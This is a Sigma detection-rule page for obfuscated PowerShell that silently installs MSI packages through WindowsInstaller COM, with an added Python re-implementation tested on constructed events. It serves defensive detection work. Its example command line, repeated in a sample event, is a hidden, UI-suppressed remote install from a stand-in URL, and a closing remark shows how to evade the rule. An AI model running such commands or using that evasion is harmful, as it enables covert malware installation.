Obfuscated PowerShell MSI Install via WindowsInstaller COM
Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (WindowsInstaller.Installer). The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of InstallProduct and COM object creation, particularly combined with hidden window execution (-W Hidden) and suppressed UI (UILevel=2), indicates an attempt to install software (likely malicious) without user interaction.
Sigma rule
title: Obfuscated PowerShell MSI Install via WindowsInstaller COM
id: 7b6a7418-3afc-11f0-aff4-000d3abf478c
status: experimental
description: |
    Detects the execution of obfuscated PowerShell commands that attempt to install MSI packages via the Windows Installer COM object (`WindowsInstaller.Installer`).
    The technique involves manipulating strings to hide functionality, such as constructing class names using string insertion (e.g., 'indowsInstaller.Installer'.Insert(0,'W')) and correcting
    malformed URLs (e.g., converting 'htps://' to 'https://') at runtime. This behavior is commonly associated with malware loaders or droppers that aim to bypass static detection
    by hiding intent in runtime-generated strings and using legitimate tools for code execution. The use of `InstallProduct` and COM object creation, particularly combined with
    hidden window execution and suppressed UI, indicates an attempt to install software (likely malicious) without user interaction.
references:
    - https://informationsecuritybuzz.com/the-real-danger-behind-a-simple-windows-shortcut/
    - https://redcanary.com/blog/threat-intelligence/intelligence-insights-may-2025/
    - https://www.virustotal.com/gui/file/f9710b0ba4de5fa0e7ec27da462d4d2fc6838eba83a19f23f6617a466bbad457
author: Meroujan Antonyan (vx3r)
date: 2025-05-27
tags:
    - attack.defense-evasion
    - attack.t1027.010
    - attack.t1218.007
    - attack.execution
    - attack.t1059.001
logsource:
    category: process_creation
    product: windows
detection:
    # Example: "C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C "$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')";
    selection_img:
        - Image|endswith:
              - '\powershell_ise.exe'
              - '\powershell.exe'
              - '\pwsh.exe'
        - OriginalFileName:
              - 'PowerShell_ISE.EXE'
              - 'PowerShell.EXE'
              - 'pwsh.dll'
    selection_cli:
        CommandLine|contains|all:
            - '-ComObject'
            - 'InstallProduct('
            - '.Insert('
            - 'UILevel'
    condition: all of selection_*
falsepositives:
    - Unknown
level: high
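To see what the rule above actually matches on, and what the '.Insert(' trick it keys on hides, here is an added example that is not part of the Sigma rule, the SigmaHQ project or the rule author's work: a Python transcription of the two selections and the condition, run over a handful of constructed process_creation events (none of them real telemetry), plus a small helper that resolves the `'literal'.Insert(index,'chars')` pattern from the description back to the string it builds. It assumes Sigma's default case-insensitive string matching; the field names (Image, OriginalFileName, CommandLine) are the ones the rule uses.

```python
"""Added example: the rule's logic re-implemented in Python over constructed events."""
import re

# Selection values transcribed from the Sigma rule above.
IMAGE_SUFFIXES = ("\\powershell_ise.exe", "\\powershell.exe", "\\pwsh.exe")
ORIGINAL_FILENAMES = ("PowerShell_ISE.EXE", "PowerShell.EXE", "pwsh.dll")
CLI_MARKERS = ("-ComObject", "InstallProduct(", ".Insert(", "UILevel")


def selection_img(event: dict) -> bool:
    """selection_img: Image|endswith OR OriginalFileName (two list items, so OR)."""
    image = event.get("Image", "").lower()
    ofn = event.get("OriginalFileName", "").lower()
    return (any(image.endswith(s.lower()) for s in IMAGE_SUFFIXES)
            or any(ofn == o.lower() for o in ORIGINAL_FILENAMES))


def selection_cli(event: dict) -> bool:
    """selection_cli: CommandLine|contains|all, every marker must be present."""
    cli = event.get("CommandLine", "").lower()
    return all(m.lower() in cli for m in CLI_MARKERS)


def matches(event: dict) -> bool:
    """condition: all of selection_*"""
    return selection_img(event) and selection_cli(event)


# 'literal'.Insert(index,'chars') -> the string PowerShell would build at runtime.
INSERT_RE = re.compile(r"'([^']*)'\.Insert\((\d+),'([^']*)'\)")


def resolve_inserts(command_line: str) -> str:
    """Collapse literal .Insert() calls (repeatedly, so chained calls resolve too)."""
    def _apply(m: re.Match) -> str:
        base, idx, ins = m.group(1), int(m.group(2)), m.group(3)
        return "'" + base[:idx] + ins + base[idx:] + "'"

    prev, cur = None, command_line
    while prev != cur:
        prev, cur = cur, INSERT_RE.sub(_apply, cur)
    return cur


# Constructed sample events (not real logs). Event 0 mirrors the rule's example comment.
SAMPLE_EVENTS = [
    {
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "OriginalFileName": "PowerShell.EXE",
        "CommandLine": (
            r'"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -W Hidden -C '
            "\"$u='htps://example.com/';$i=New-Object -ComObject('indowsInstaller.Installer'.Insert(0,'W'));"
            "$i.UILevel=2;$i.InstallProduct($(if($u.StartsWith('htps://')){$u.Insert(2,'t')}else{$u}),'')\""
        ),
    },
    {   # renamed pwsh binary: Image misses, OriginalFileName 'pwsh.dll' still hits
        "Image": r"C:\Users\Public\svc.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": "svc.exe -nop -c \"$i=New-Object -ComObject 'WindowsInstaller.Installer';"
                       "$i.UILevel=2;$i.InstallProduct('x'.Insert(0,'y'),'')\"",
    },
    {   # routine scripted install via pwsh: no '-ComObject' / '.Insert(' on the command line
        "Image": r"C:\Program Files\PowerShell\7\pwsh.exe",
        "OriginalFileName": "pwsh.dll",
        "CommandLine": r"pwsh.exe -File C:\ops\install.ps1",
    },
    {   # all four CLI markers present, but the image is not a PowerShell host
        "Image": r"C:\Windows\System32\cmd.exe",
        "OriginalFileName": "Cmd.Exe",
        "CommandLine": "cmd.exe /c echo -ComObject InstallProduct( .Insert( UILevel",
    },
]


def run(events=SAMPLE_EVENTS) -> list:
    """Return the indexes of events the rule would alert on."""
    return [i for i, e in enumerate(events) if matches(e)]


if __name__ == "__main__":
    for i in run():
        print(f"ALERT event[{i}]: {resolve_inserts(SAMPLE_EVENTS[i]['CommandLine'])}")
```

Two things worth noting from running it: the OriginalFileName branch is what keeps a renamed `pwsh.exe` (event 1) in scope, and the rule's reach is bounded by the four literal substrings it requires, so a loader that builds the class name with, say, `-join` or `[char]` arithmetic instead of `.Insert(` would not trip this particular rule even though the COM install behaviour is identical.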
Related rules
- Powershell Executed From Headless ConHost Process
- Obfuscated PowerShell OneLiner Execution
- Custom Cobalt Strike Command Execution
- Potential BlackByte Ransomware Activity
- Remote Thread Creation Via PowerShell In Uncommon Target